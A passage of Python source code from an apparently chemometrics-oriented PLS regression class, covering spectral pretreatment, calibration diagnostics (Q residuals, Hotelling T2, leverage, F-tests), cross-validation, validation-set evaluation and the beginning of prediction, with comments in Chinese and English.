    self.calx_pretreated1_stdev = np.std(spec_pretreated1[1:, :] - self.calx_pretreated1_mean, axis=0, ddof=1)
    # Save mean and stdev of y
    self.caly_mean = np.mean(target, axis=0)
    caly_mc = target - self.caly_mean
    self.caly_stdev = np.std(caly_mc, axis=0, ddof=1)
    # ----------------- pretreat2 -----------------
    if self.pretreat_method2 is not None:
        self.pretreat4spec2 = eval(self.pretreat_method2.upper())()
        self.pretreat4target = eval(self.pretreat_method2.upper() + '4Data')()
        spec_pretreated2 = self.pretreat4spec2.fit_transform(spec_pretreated1)
        target_pretreated = self.pretreat4target.fit_transform(target)
    else:
        self.pretreat4spec2 = 'None'
        self.pretreat4target = 'None'
        spec_pretreated2 = spec_pretreated1
        target_pretreated = target
    return spec_pretreated2, target_pretreated
def _spec_pretreat4transform(self, spec_matrix):
if self.pretreat_method1 is not None:
# pretreat4spec1 ---- eval(self.pretreat_method1)(**self.pretreat_params1)
# 实例对象
spec_pretreated1 = self.pretreat4spec1.transform(spec_matrix)
else:
spec_pretreated1 = spec_matrix
if self.pretreat_method2 is not None:
# pretreat4spec2 ---- eval(self.pretreat_method2)(**self.pretreat_params2)
# 实例对象
spec_pretreated2 = self.pretreat4spec2.transform(spec_pretreated1)
else:
spec_pretreated2 = spec_pretreated1
return spec_pretreated2
def _target_inverse_pretreat(self, target):
if self.pretreat_method2 is not None:
target_inverse_pretreated = self.pretreat4target.inverse_transform(target)
else:
target_inverse_pretreated = target
return target_inverse_pretreated
def _spec_target_pretreat_cv(self, spec_cv, target_cv):
# ----------------- pretreat1 -----------------
if self.pretreat_method1 is not None:
self.pretreat4spec1_cv = eval(self.pretreat_method1.upper())(**self.pretreat_params1) # 类的实例
spec_pretreated1_cv = self.pretreat4spec1_cv.fit_transform(spec_cv)
else:
self.pretreat4spec1_cv = 'None'
spec_pretreated1_cv = spec_cv
# 保存pretreat1预处理完的光谱的mean和stdev
self.calx_pretreated1_mean_cv = np.mean(spec_pretreated1_cv[1:, :], axis=0)
self.calx_pretreated1_stdev_cv = np.std(spec_pretreated1_cv[1:, :] - self.calx_pretreated1_mean_cv, axis=0, ddof=1)
# 保存y的mean和stdev
self.caly_mean_cv = np.mean(target_cv, axis=0)
caly_mc_cv = target_cv - self.caly_mean_cv
self.caly_stdev_cv = np.std(caly_mc_cv, axis=0, ddof=1)
# ----------------- pretreat2 -----------------
if self.pretreat_method2 is not None:
self.pretreat4spec2_cv = eval(self.pretreat_method2.upper())()
self.pretreat4target_cv = eval(self.pretreat_method2.upper() + '4Data')()
spec_pretreated2_cv = self.pretreat4spec2_cv.fit_transform(spec_pretreated1_cv)
target_pretreated_cv = self.pretreat4target_cv.fit_transform(target_cv)
else:
self.pretreat4spec2_cv = 'None'
self.pretreat4target_cv = 'None'
spec_pretreated2_cv = spec_pretreated1_cv
target_pretreated_cv = target_cv
return spec_pretreated2_cv, target_pretreated_cv
def _spec_pretreat4transform_cv(self, spec_matrix_cv):
if self.pretreat_method1 is not None:
# pretreat4spec1 ---- eval(self.pretreat_method1)(**self.pretreat_params1)
# 实例对象
spec_pretreated1_cv = self.pretreat4spec1_cv.transform(spec_matrix_cv)
else:
spec_pretreated1_cv = spec_matrix_cv
if self.pretreat_method2 is not None:
# pretreat4spec2 ---- eval(self.pretreat_method2)(**self.pretreat_params2)
# 实例对象
spec_pretreated2_cv = self.pretreat4spec2_cv.transform(spec_pretreated1_cv)
else:
spec_pretreated2_cv = spec_pretreated1_cv
return spec_pretreated2_cv
def _target_inverse_pretreat_cv(self, target_cv):
if self.pretreat_method2 is not None:
target_inverse_pretreated_cv = self.pretreat4target_cv.inverse_transform(target_cv)
else:
target_inverse_pretreated_cv = target_cv
return target_inverse_pretreated_cv
    def calibration(self, calset_spec_intersect, calset_target, calset_indices=None):
        """Build the PLS calibration model and its diagnostic statistics.

        :param calset_spec_intersect: spectra matrix; row 0 is the wavelength
            axis, remaining rows are sample absorbances
        :param calset_target: reference values, shape (n,) or (n, 1)
        :param calset_indices: original sample indices used in outlier
            reporting; defaults to 0..n-1
        :return: dict with regression coefficients ``b``, fitted values,
            residual/leverage/T2/Q statistics with their control limits,
            outlier lists, and ``model_parameters`` needed for prediction
        """
        if calset_target.ndim == 1:
            calset_target = calset_target[:, np.newaxis]  # column vector so broadcasting works for multi-column stats
        calset_ab_intersect = calset_spec_intersect[1:, :]
        self.calx_mean = np.mean(calset_ab_intersect, axis=0)
        n_samples = calset_ab_intersect.shape[0]
        if calset_indices is None:
            calset_indices = np.arange(n_samples)
        # ------------- spectral and target pretreatment -------------
        spec, target = self._spec_target_pretreat(calset_spec_intersect, calset_target)
        # ------------- select wavelength points -------------
        spec_subset = spec[:, self.variable_indices]
        ab_subset = spec_subset[1:, :]
        # ------------- run PLSR -------------
        calplsr = PLSR(self.algorithm, self.max_nlv)
        cal_result = calplsr.fit_predict(spec_subset, target)
        b = cal_result['b']
        fit_value_temp = cal_result['fit_value']
        fit_value = self._target_inverse_pretreat(fit_value_temp)
        pls_result = cal_result['pls_result']
        x_loadings = cal_result['x_loadings']
        x_scores = cal_result['x_scores']
        x_scores_weights = cal_result['x_scores_weights']
        # ------------- diagnostic statistics -------------
        # -------- spectral (Q) residuals
        q_result = q_calc(x_loadings, x_scores, ab_subset)
        q = q_result['q']
        x_residual = sqrt(q_result['q'])
        residual_matrix_list = q_result['residual_matrix_list']
        fitting_x_list = q_result['fitting_x_list']
        x_sample_residuals = q_result['x_sample_residuals']
        x_variable_residuals = q_result['x_variable_residuals']
        x_total_residuals = q_result['x_total_residuals']
        explained_x_sample_variance = q_result['explained_x_sample_variance']
        explained_x_variable_variance = q_result['explained_x_variable_variance']
        explained_x_total_variance = q_result['explained_x_total_variance']
        explained_x_variance_ratio = q_result['explained_x_variance_ratio']
        # ---- t2_limit, t_critical_value and q_limit, one row per significance level
        sl = self.significance_level  # iterable of significance levels
        t2_limit = zeros((len(sl), self.max_nlv))
        t_critical_value = zeros((len(sl), self.max_nlv))  # critical value of the studentized residual
        q_limit = zeros((len(sl), self.max_nlv))
        # refer to: Interpreting PLS plots
        # The critical value of the Q-residuals are estimated from the eigenvalues of E, as described in Jackson and Mudholkar, 1979.
        prevent_invalid_for_nan_warn = np.seterr(invalid='ignore')
        eigenvalues_list = []
        for lv in range(self.max_nlv):
            e = q_result['residual_matrix_list'][lv]
            U, S, V = np.linalg.svd(e, full_matrices=False)
            eigenvalues_list.append(S ** 2 / (n_samples - 1))  # note the (n_samples - 1) part for unbiased estimate of var
        for i in range(self.max_nlv):  # latent-variable index 0..max_nlv-1
            for j in range(len(sl)):  # one row per significance level
                # ---- t2_limit ----
                nlv = i + 1
                # .ppf's q argument is the lower-tail probability
                t2_limit_sl = nlv * (n_samples - 1) / (n_samples - nlv) * sps.f.ppf(1 - sl[j], nlv, n_samples - nlv)
                t2_limit[j, i] = t2_limit_sl
                # ---- two-tailed studentized-residual critical value: t.ppf(1 - sl/2, df)
                if self.pretreat_method2 is not None:
                    df = n_samples - nlv - 1
                else:
                    df = n_samples - nlv
                t_critical_value_sl = sps.t.ppf(1 - sl[j] / 2, df)
                t_critical_value[j, i] = t_critical_value_sl
                # ---- q_limit (Jackson & Mudholkar approximation) ----
                evalues_unused = eigenvalues_list[i]
                theta1 = np.sum(evalues_unused)
                theta2 = np.sum(evalues_unused ** 2)
                theta3 = np.sum(evalues_unused ** 3)
                h0 = 1 - (2 * theta1 * theta3) / (3 * theta2 ** 2)
                if h0 < 0.001:
                    h0 = 0.001
                # .ppf's q argument is the lower-tail probability
                ca = sps.norm.ppf(1 - sl[j])
                h1 = ca * sqrt(2 * theta2 * h0 ** 2) / theta1
                h2 = theta2 * h0 * (h0 - 1) / (theta1 ** 2)
                # one limit per significance level
                q_limit_sl = theta1 * (1 + h1 + h2) ** (1 / h0)
                q_limit[j, i] = q_limit_sl
        # -------- Leverage & Hotelling TSquared
        leverage_t2_result = leverage_t2_calc(x_scores, x_scores)
        leverage = leverage_t2_result['leverage']
        leverage_limit = 3 * mean(leverage, axis=0)
        t2 = leverage_t2_result['t2']
        # x_Fvalue, x_Fprob ---- refer to OPUS
        x_fvalue = (n_samples - 1) * x_residual ** 2 / (sum(square(x_residual), axis=0) - x_residual ** 2)
        x_fprob = sps.distributions.f.cdf(x_fvalue, 1, n_samples - 1)
        # y_Fvalue, y_Fprob ---- refer to OPUS
        y_residual = fit_value - calset_target
        y_fvalue = (n_samples - 1) * y_residual ** 2 / (sum(square(y_residual), axis=0) - y_residual ** 2)
        y_fprob = sps.distributions.f.cdf(y_fvalue, 1, n_samples - 1)
        # r2, SEC, press, rpd, bias for every number of latent variables
        sec_statistics_result = self._sec_calc(fit_value, calset_target)
        r2 = sec_statistics_result['r2']
        press = sec_statistics_result['press']
        rmsec = sec_statistics_result['rmsec']
        sec = sec_statistics_result['sep']
        rpd = sec_statistics_result['rpd']
        bias = sec_statistics_result['bias']
        linear_regression_coefficient = sec_statistics_result['linear_regression_coefficient']
        relative_error = sec_statistics_result['relative_error']
        # ---- studentized residuals (y_tvalue, added 2019-01-15)
        prevent_invalid_for_negetive_sqrt = np.seterr(invalid='ignore')
        y_tvalue = y_residual / (rmsec * sqrt(1 - leverage))
        # ---- outlier detection (leverage-based for X, F-probability-based for y)
        outlier_dectect_result = outlier_detect(leverage, leverage_limit, y_fprob, calset_indices)
        x_outlier_indices_list = outlier_dectect_result['x_outlier_indices_list']
        y_outlier_indices_list = outlier_dectect_result['y_outlier_indices_list']
        just_x_outlier_list = outlier_dectect_result['just_x_outlier_list']
        just_y_outlier_list = outlier_dectect_result['just_y_outlier_list']
        both_xy_outlier_list = outlier_dectect_result['both_xy_outlier_list']
        ########################## parameters required at prediction time ##########################
        # calx_mean, calx_pretreated1_mean, calx_pretreated1_stdev,
        # caly_mean, caly_stdev, b, calx_loadings, calx_scores, calx_scores_weights,
        # leverage_limit, testset_indices = None
        model_parameters = {'pretreat_method1':self.pretreat_method1,
                            'pretreat_params1':self.pretreat_params1,
                            'pretreat_method2':self.pretreat_method2,
                            'calx_mean':self.calx_mean,
                            'calx_pretreated1_mean':self.calx_pretreated1_mean,
                            'calx_pretreated1_stdev':self.calx_pretreated1_stdev,
                            'caly_mean':self.caly_mean,
                            'caly_stdev':self.caly_stdev,
                            'b':b,
                            'calx_loadings':x_loadings,
                            'calx_scores':x_scores,
                            'calx_scores_weights':x_scores_weights,
                            'leverage_limit':leverage_limit,
                            't2_limit':t2_limit,
                            'q_limit':q_limit,
                            'variable_indices':self.variable_indices}
        return {'b':b,
                'fit_value': fit_value,
                'y_residual': y_residual,
                'x_residual': x_residual,
                'fitting_x_list': fitting_x_list,
                'residual_matrix_list': residual_matrix_list,
                'x_sample_residuals': x_sample_residuals,
                'x_variable_residuals': x_variable_residuals,
                'x_total_residuals': x_total_residuals,
                'explained_x_sample_variance': explained_x_sample_variance,
                'explained_x_variable_variance': explained_x_variable_variance,
                'explained_x_total_variance': explained_x_total_variance,
                'explained_x_variance_ratio': explained_x_variance_ratio,
                'pls_result': pls_result,
                't2': t2,
                't2_limit':t2_limit,
                'leverage': leverage,
                'leverage_limit': leverage_limit,
                'q': q,
                'q_limit': q_limit,
                'x_loadings': x_loadings,
                'x_scores': x_scores,
                'x_scores_weights': x_scores_weights,
                'x_fvalue': x_fvalue,
                'x_fprob': x_fprob,
                'y_fvalue': y_fvalue,
                'y_fprob': y_fprob,
                'y_tvalue': y_tvalue,  # studentized residuals
                't_critical_value': t_critical_value,  # studentized-residual critical values
                'r2': r2,
                'press': press,
                'rmsec': rmsec,
                'sec': sec,
                'rpd': rpd,
                'bias':bias,
                'linear_regression_coefficient': linear_regression_coefficient,
                'relative_error': relative_error,
                'x_outlier_indices_list': x_outlier_indices_list,
                'y_outlier_indices_list': y_outlier_indices_list,
                'just_x_outlier_list': just_x_outlier_list,
                'just_y_outlier_list': just_y_outlier_list,
                'both_xy_outlier_list': both_xy_outlier_list,
                'model_parameters':model_parameters}
def cv(self, calset_spec_intersect, calset_target, cv_sampling_method='cv_lpo_systematic_sampling',
sampling_param={'p': 3}, calset_indices=None):
'''
Cross PLSValidation
:return:
'''
if calset_target.ndim == 1:
calset_target = calset_target[:, np.newaxis] # 用于多维结果的broadcast计算
self.cv_sampling_method = cv_sampling_method
self.sampling_param=sampling_param
self.calset_target = calset_target
self.calset_spec_intersect = calset_spec_intersect
self.calset_wavelength_intersect = self.calset_spec_intersect[0, :]
self.calset_ab_intersect = self.calset_spec_intersect[1:, :]
n_cal_samples = self.calset_spec_intersect.shape[0] - 1
if calset_indices is None:
calset_indices = np.arange(n_cal_samples)
# -------- 处理variable_indices (indices针对intersect, 而非全谱) --------
# 手工选择的谱区或BIPLS得到的谱区; 如果是离散的波长点,则事先已经得到
if self.customized_regions is not None:
self.verified_regions = verify_customized_regions(self.calset_wavelength_intersect, self.customized_regions)
self.variable_indices = generate_variable_indices(self.calset_wavelength_intersect, self.customized_regions)
else:
self.customized_regions = [[self.calset_wavelength_intersect[0], self.calset_wavelength_intersect[-1]]]
self.verified_regions = verify_customized_regions(self.calset_wavelength_intersect, self.customized_regions)
self.variable_indices = generate_variable_indices(self.calset_wavelength_intersect, self.customized_regions)
# 处理维数过大的问题
if self.max_nlv > np.min((self.calset_spec_intersect.shape[0] - 1, self.variable_indices.size)):
self.max_nlv = np.min((self.calset_spec_intersect.shape[0] - 1, self.variable_indices.size))
n_variables = self.variable_indices.size
# =========================== Calibration start ===========================
self.cal_result = self.calibration(self.calset_spec_intersect, self.calset_target, calset_indices=calset_indices)
calx_scores = self.cal_result['x_scores']
leverage_limit = self.cal_result['leverage_limit']
# =========================== Calibration end ===========================
# =========================== Cross PLSValidation start ===========================
x = self.calset_ab_intersect
y = self.calset_target
# -------- 交叉验证划分集合 --------
train_indices_list, test_indices_list = eval(self.cv_sampling_method)(n_cal_samples, **self.sampling_param)
n_fold = len(train_indices_list)
cv_predict_value = zeros((n_cal_samples, self.max_nlv)) # 列出所有样本各个维数的预测结果
cv_x_residual = zeros((n_cal_samples, self.max_nlv)) # 列出所有样本各个维数的光谱残差
cv_y_residual = zeros((n_cal_samples, self.max_nlv)) # 列出所有样本各个维数的预测残差
cv_x_scores = zeros((n_cal_samples, self.max_nlv)) # 列出所有样本各个维数的得分
cv_residual_matrix = zeros((self.max_nlv, n_cal_samples, n_variables)) # 三维数组(nlv, m, n)
cv_fitting_x = zeros((self.max_nlv, n_cal_samples, n_variables)) # 三维数组(nlv, m, n)
cv_ab_pretreated = zeros((n_cal_samples, n_variables)) # 存储每个交叉验证中预处理后的样品
cv_q = zeros((n_cal_samples, self.max_nlv))
# ======================== 开始交叉验证 ========================
for i in range(n_fold):
calx_cv, caly_cv = x[train_indices_list[i], :], y[train_indices_list[i]]
valx_cv, valy_cv = x[test_indices_list[i], :], y[test_indices_list[i]]
# --------- 区分了校正子集和预测子集,开始光谱和组分预处理 ---------
calspec_cv = np.vstack((self.calset_wavelength_intersect, calx_cv))
valspec_cv = np.vstack((self.calset_wavelength_intersect, valx_cv))
calspec_cv_pretreated, caly_cv_pretreated = self._spec_target_pretreat_cv(calspec_cv, caly_cv)
valspec_cv_pretreated = self._spec_pretreat4transform_cv(valspec_cv)
# --------- 根据variable indices, 截取波长点, 开始计算 ---------
calspec_subset = calspec_cv_pretreated[:, self.variable_indices]
valspec_subset = valspec_cv_pretreated[:, self.variable_indices]
valx_subset = valspec_subset[1:, :]
sub_plsr = PLSR(algorithm=self.algorithm, max_nlv=self.max_nlv)
sub_plsr.fit(calspec_subset, caly_cv_pretreated) # 只需要fit
sub_pls_result = sub_plsr.pls_result
calx_loadings_cv = sub_pls_result['x_loadings']
# calx_scores_cv = sub_pls_result['x_scores']
calx_scores_weights_cv = sub_pls_result['x_scores_weights']
# --------- val_predict_value_temp 根据pretreat_method2做inverse_transform---------
val_predicte_value_temp = sub_plsr.val_predict(valspec_subset)['predict_value']
val_predict_value = self._target_inverse_pretreat_cv(val_predicte_value_temp)
val_y_residual = val_predict_value - valy_cv
cv_predict_value[test_indices_list[i], :] = val_predict_value
# ---------- 部分统计指标 ----------
val_x_scores = dot(valx_subset, calx_scores_weights_cv)
cv_x_scores[test_indices_list[i], :] = val_x_scores
# ---- 光谱残差
cv_ab_pretreated[test_indices_list[i], :] = valx_subset # 用于计算explained_x_total_variance
val_q_result = q_calc_cv(calx_loadings_cv, val_x_scores, valx_subset)
val_q = val_q_result['q']
val_x_residual = sqrt(val_q_result['q'])
val_residual_matrix_list = val_q_result['residual_matrix_list'] # 等待存储
val_fitting_x_list = val_q_result['fitting_x_list'] # 等待存储
for j in range((self.max_nlv)): # 存入三维数组
cv_residual_matrix[j, test_indices_list[i], :] = val_residual_matrix_list[j]
cv_fitting_x[j, test_indices_list[i], :] = val_fitting_x_list[j]
cv_q[test_indices_list[i], :] = val_q
# ---- 处理 x_residual 与 y_residual
cv_x_residual[test_indices_list[i], :] = val_x_residual
cv_y_residual[test_indices_list[i], :] = val_y_residual
# ---------------- 交叉验证完毕,统一计算 ----------------
# ---- x_variable_residuals 和 x_total_residuals
cv_x_sample_residuals = np.sum(cv_residual_matrix ** 2, axis=2).T / n_variables
cv_x_variable_residuals = np.sum(cv_residual_matrix ** 2, axis=1).T / n_cal_samples # (n_variables, n_lv)
cv_x_total_residuals = np.mean(cv_x_variable_residuals, axis=0, keepdims=True) # (1, n_lv)
cv_explained_x_sample_variance = (1 - cv_x_sample_residuals / \
(np.sum(cv_ab_pretreated ** 2, axis=1, keepdims=True) / n_variables)) * 100
cv_explained_x_variable_variance = (1 - cv_x_variable_residuals.T /
(np.sum(cv_ab_pretreated ** 2, axis=0) / n_cal_samples)) * 100
cv_explained_x_total_variance = (1 - cv_x_total_residuals / np.mean(cv_ab_pretreated ** 2)) * 100
cv_explained_x_variance_ratio = np.hstack((cv_explained_x_total_variance[:, 0:1],
np.diff(cv_explained_x_total_variance)))
# ---- 将 cv_residual_matrix 和 cv_fitting_x 三维数组重新处理成list
cv_residual_matrix_list = [cv_residual_matrix[i, :, :] for i in range(self.max_nlv)]
cv_fitting_x_list = [cv_fitting_x[i, :, :] for i in range(self.max_nlv)]
# ---- Leverage & Hotelling TSquared (20190120 OK)
leverage_t2_result = leverage_t2_calc_cv(cv_x_scores, calx_scores)
cv_leverage = leverage_t2_result['leverage']
cv_t2 = leverage_t2_result['t2']
# 计算x_residual的fvalue和fprob
x_fvalue = (n_cal_samples - 1) * cv_x_residual ** 2 / (
sum(square(cv_x_residual), axis=0) - cv_x_residual ** 2)
x_fprob = sps.distributions.f.cdf(x_fvalue, 1, n_cal_samples - 1)
# 计算y_residual的fvalue和fprob
y_fvalue = (n_cal_samples - 1) * cv_y_residual ** 2 / (
sum(square(cv_y_residual), axis=0) - cv_y_residual ** 2)
y_fprob = sps.distributions.f.cdf(y_fvalue, 1, n_cal_samples - 1)
# 计算r2, rmsecv, press, rpd, bias(全部维数)
rmse_statistics = rmse_calc(cv_predict_value, self.calset_target)
r2 = rmse_statistics['r2']
rmsecv = rmse_statistics['rmse']
secv = rmse_statistics['sep']
press = rmse_statistics['press']
rpd = rmse_statistics['rpd']
bias = rmse_statistics['bias']
linear_regression_coefficient = rmse_statistics['linear_regression_coefficient']
relative_error = rmse_statistics['relative_error']
# ---- 20190128增加y_tvalue(学生化残差)
prevent_invalid_for_negetive_sqrt = np.seterr(invalid='ignore')
y_tvalue = cv_y_residual / (rmsecv * sqrt(1 - cv_leverage)) # 20190128 与 Unscrambler 保持一致, 除以RMSECV
# 推荐维数
min_press = min(press)
press_fvalue = press / min_press
press_fprob = sps.distributions.f.cdf(press_fvalue, n_cal_samples, n_cal_samples)
if np.all(press_fprob >= 0.75):
self.optimal_nlv = self.max_nlv
else:
self.optimal_nlv = np.where(press_fprob < 0.75)[0][0] + 1
optimal_rmsecv = rmsecv[self.optimal_nlv - 1]
# ======== outlier 检测 ========
outlier_dectect_result = outlier_detect(cv_leverage, leverage_limit, y_fprob, calset_indices)
x_outlier_indices_list = outlier_dectect_result['x_outlier_indices_list']
y_outlier_indices_list = outlier_dectect_result['y_outlier_indices_list']
just_x_outlier_list = outlier_dectect_result['just_x_outlier_list']
just_y_outlier_list = outlier_dectect_result['just_y_outlier_list']
both_xy_outlier_list = outlier_dectect_result['both_xy_outlier_list']
# ======== 保存cv结果 ========
cv_result = {'predict_value': cv_predict_value,
'x_residual': cv_x_residual,
'y_residual': cv_y_residual,
'fitting_x_list': cv_fitting_x_list,
'residual_matrix_list': cv_residual_matrix_list,
'x_sample_residuals': cv_x_sample_residuals,
'x_variable_residuals': cv_x_variable_residuals,
'x_total_residuals': cv_x_total_residuals,
'explained_x_sample_variance': cv_explained_x_sample_variance,
'explained_x_variable_variance': cv_explained_x_variable_variance.T,
'explained_x_total_variance': cv_explained_x_total_variance,
'explained_x_variance_ratio': cv_explained_x_variance_ratio,
'leverage': cv_leverage,
't2': cv_t2,
'q': cv_q,
'x_scores': cv_x_scores,
'x_fvalue': x_fvalue,
'x_fprob': x_fprob,
'y_fvalue': y_fvalue,
'y_fprob': y_fprob,
'y_tvalue': y_tvalue, # 学生化残差
'r2': r2,
'rmsecv': rmsecv,
'secv': secv,
'optimal_nlv': self.optimal_nlv,
'optimal_rmsecv': optimal_rmsecv,
'press': press,
'rpd': rpd,
'bias': bias,
'linear_regression_coefficient': linear_regression_coefficient,
'relative_error': relative_error,
'x_outlier_indices_list': x_outlier_indices_list,
'y_outlier_indices_list': y_outlier_indices_list,
'just_x_outlier_list': just_x_outlier_list,
'just_y_outlier_list': just_y_outlier_list,
'both_xy_outlier_list': both_xy_outlier_list}
return {'cv_result': cv_result, 'cal_result': self.cal_result}
def vv(self, calset_spec_intersect, calset_target, valset_spec_intersect, valset_target,
calset_indices=None, valset_indices=None):
'''
Valset PLSValidation, 利用校正集校正,预测验证集,得出最佳nlv
:return:
'''
if calset_target.ndim == 1:
calset_target = calset_target[:, np.newaxis] # 用于多维结果的broadcast计算
if valset_target.ndim == 1:
valset_target = valset_target[:, np.newaxis] # 用于多维结果的broadcast计算
self.calset_target = calset_target
self.valset_target = valset_target
self.calset_spec_intersect = calset_spec_intersect
self.calset_wavelength_intersect = self.calset_spec_intersect[0, :]
self.calset_ab_intersect = self.calset_spec_intersect[1:, :]
self.valset_spec_intersect = valset_spec_intersect
self.valset_wavelength_intersect = self.valset_spec_intersect[0, :]
self.valset_ab_intersect = self.valset_spec_intersect[1:, :]
# -------- 处理variable_indices (indices针对intersect, 而非全谱) --------
if self.customized_regions is not None:
self.verified_regions = verify_customized_regions(self.calset_wavelength_intersect, self.customized_regions)
self.variable_indices = generate_variable_indices(self.calset_wavelength_intersect, self.customized_regions)
else:
self.customized_regions = [[self.calset_wavelength_intersect[0], self.calset_wavelength_intersect[-1]]]
self.verified_regions = verify_customized_regions(self.calset_wavelength_intersect, self.customized_regions)
self.variable_indices = generate_variable_indices(self.calset_wavelength_intersect, self.customized_regions)
# 处理维数过大的问题
if self.max_nlv > np.min((self.calset_spec_intersect.shape[0] - 1, self.variable_indices.size)):
self.max_nlv = np.min((self.calset_spec_intersect.shape[0] - 1, self.variable_indices.size))
# =========================== Calibration start ===========================
self.cal_result = self.calibration(self.calset_spec_intersect, self.calset_target, calset_indices=calset_indices)
leverage_limit = self.cal_result['leverage_limit']
calx_loadings = self.cal_result['x_loadings']
calx_scores = self.cal_result['x_scores']
calx_scores_weights = self.cal_result['x_scores_weights']
b = self.cal_result['b']
# =========================== Calibration end ===========================
# =========================== Valset PLSValidation start ===========================
n_val_samples = self.valset_ab_intersect.shape[0]
# ------------------ 验证集光谱预处理 ------------------
valspec_pretreated = self._spec_pretreat4transform(self.valset_spec_intersect)
# --------- 根据variable indices, 截取波长点 ---------
valspec_subset = valspec_pretreated[:, self.variable_indices]
valx_subset = valspec_subset[1:, :]
# --------- 开始预测 ---------
val_predicte_value_temp = dot(valx_subset, b)
val_predict_value = self._target_inverse_pretreat(val_predicte_value_temp)
val_y_residual = val_predict_value - self.valset_target
# ---------- 统计指标 ----------
val_x_scores = dot(valx_subset, calx_scores_weights)
# -------- Leverage & Hotelling TSquared
leverage_t2_result = leverage_t2_calc(val_x_scores, calx_scores)
val_leverage = leverage_t2_result['leverage']
val_t2 = leverage_t2_result['t2']
if n_val_samples < 2:
# 保存vv结果
vv_result = {'predict_value': val_predict_value,
'x_scores': val_x_scores,
'leverage': val_leverage,
't2': val_t2,
'y_residual': val_y_residual}
else:
# --------------- 验证完毕,统一计算 ---------------
# ---- 光谱残差
val_q_result = q_calc(calx_loadings, val_x_scores, valx_subset)
val_q = val_q_result['q']
val_f_residuals = val_q_result['f_residuals']
val_x_residual = sqrt(val_q_result['q'])
val_residual_matrix_list = val_q_result['residual_matrix_list']
val_fitting_x_list = val_q_result['fitting_x_list']
val_x_sample_residuals = val_q_result['x_sample_residuals']
val_x_variable_residuals = val_q_result['x_variable_residuals']
val_x_total_residuals = val_q_result['x_total_residuals']
val_explained_x_sample_variance = val_q_result['explained_x_sample_variance']
val_explained_x_variable_variance = val_q_result['explained_x_variable_variance']
val_explained_x_total_variance = val_q_result['explained_x_total_variance']
val_explained_x_variance_ratio = val_q_result['explained_x_variance_ratio']
# ---- 计算x_residual的fvalue和fprob
x_fvalue = (n_val_samples - 1) * val_x_residual ** 2 / (sum(square(val_x_residual), axis=0) - val_x_residual ** 2)
x_fprob = sps.distributions.f.cdf(x_fvalue, 1, n_val_samples - 1)
# 计算y_residual的fvalue和fprob
y_fvalue = (n_val_samples - 1) * val_y_residual ** 2 / (sum(square(val_y_residual), axis=0) - val_y_residual ** 2)
y_fprob = sps.distributions.f.cdf(y_fvalue, 1, n_val_samples - 1)
# 计算r2, rmsecv, press, rpd, bias(全部维数)
rmse_statistics = rmse_calc(val_predict_value, self.valset_target)
r2 = rmse_statistics['r2']
rmsep = rmse_statistics['rmse']
sep = rmse_statistics['sep']
press = rmse_statistics['press']
rpd = rmse_statistics['rpd']
bias = rmse_statistics['bias']
linear_regression_coefficient = rmse_statistics['linear_regression_coefficient']
relative_error = rmse_statistics['relative_error']
# ---- 20190128增加y_tvalue(学生化残差)
prevent_invalid_for_negetive_sqrt = np.seterr(invalid='ignore')
y_tvalue = val_y_residual / (rmsep * sqrt(1 - val_leverage)) # 20190128 与 Unscrambler 保持一致, 除以RMSEP
# 推荐维数
min_press = min(press)
press_fvalue = press / min_press
press_fprob = sps.distributions.f.cdf(press_fvalue, n_val_samples, n_val_samples)
if np.all(press_fprob >= 0.75) :
self.optimal_nlv = self.max_nlv
else:
self.optimal_nlv = np.where(press_fprob < 0.75)[0][0] + 1
optimal_rmsep = rmsep[self.optimal_nlv - 1]
# ======== outlier 检测 ========
outlier_dectect_result = outlier_detect(val_leverage, leverage_limit, y_fprob, valset_indices)
x_outlier_indices_list = outlier_dectect_result['x_outlier_indices_list']
y_outlier_indices_list = outlier_dectect_result['y_outlier_indices_list']
just_x_outlier_list = outlier_dectect_result['just_x_outlier_list']
just_y_outlier_list = outlier_dectect_result['just_y_outlier_list']
both_xy_outlier_list = outlier_dectect_result['both_xy_outlier_list']
# 保存vv结果
vv_result = {'predict_value': val_predict_value,
'x_scores': val_x_scores,
'leverage': val_leverage,
't2': val_t2,
'q': val_q,
'val_f_residuals': val_f_residuals,
'y_residual': val_y_residual,
'x_residual': val_x_residual,
'fitting_x_list': val_fitting_x_list,
'residual_matrix_list': val_residual_matrix_list,
'x_sample_residuals': val_x_sample_residuals,
'x_variable_residuals': val_x_variable_residuals,
'x_total_residuals': val_x_total_residuals,
'explained_x_sample_variance': val_explained_x_sample_variance,
'explained_x_variable_variance': val_explained_x_variable_variance,
'explained_x_total_variance': val_explained_x_total_variance,
'explained_x_variance_ratio': val_explained_x_variance_ratio,
'x_fvalue': x_fvalue,
'x_fprob': x_fprob,
'y_fvalue': y_fvalue,
'y_fprob': y_fprob,
'y_tvalue': y_tvalue, # 学生化残差
'r2': r2,
'rmsep': rmsep,
'sep': sep,
'optimal_nlv': self.optimal_nlv,
'optimal_rmsep': optimal_rmsep,
'press': press,
'rpd': rpd,
'bias': bias,
'linear_regression_coefficient': linear_regression_coefficient,
'relative_error': relative_error,
'x_outlier_indices_list': x_outlier_indices_list,
'y_outlier_indices_list': y_outlier_indices_list,
'just_x_outlier_list': just_x_outlier_list,
'just_y_outlier_list': just_y_outlier_list,
'both_xy_outlier_list': both_xy_outlier_list,
'residual_matrix_list': val_residual_matrix_list,
'fitting_x_list': val_fitting_x_list}
return {'vv_result': vv_result, 'cal_result': self.cal_result}
    def predict(self, testset_spec_intersect, nlv=None, testset_indices=None, testset_target=None):
        """Predict the test set with the calibrated model at a fixed nlv.

        :param testset_spec_intersect: spectra matrix; row 0 is the wavelength
            axis, remaining rows are sample absorbances
        :param nlv: number of latent variables to use; defaults to the
            optimal_nlv recommended by cv()/vv()
        :param testset_indices: original sample indices for outlier reporting;
            defaults to 0..n-1
        :param testset_target: optional reference values; when given (and at
            least 2 samples), the full set of validation statistics is returned
        :return: dict of predictions and, when references are available,
            residual/outlier/significance statistics
        """
        if nlv is None:
            self.nlv = self.optimal_nlv
        else:
            self.nlv = nlv
        self.testset_spec_intersect = testset_spec_intersect
        n_test_samples = self.testset_spec_intersect.shape[0] - 1
        # --------- extract the model parameters for the chosen nlv ---------
        model_parameters = self.cal_result['model_parameters']
        b = model_parameters['b'][:, self.nlv - 1]
        calx_loadings = model_parameters['calx_loadings'][:, :self.nlv]  # columns 0 .. nlv-1
        calx_scores = model_parameters['calx_scores'][:, :self.nlv]  # columns 0 .. nlv-1
        calx_scores_weights = model_parameters['calx_scores_weights'][:, :self.nlv]  # columns 0 .. nlv-1
        leverage_limit = model_parameters['leverage_limit'][self.nlv - 1]  # limit for this nlv
        if b.ndim == 1:
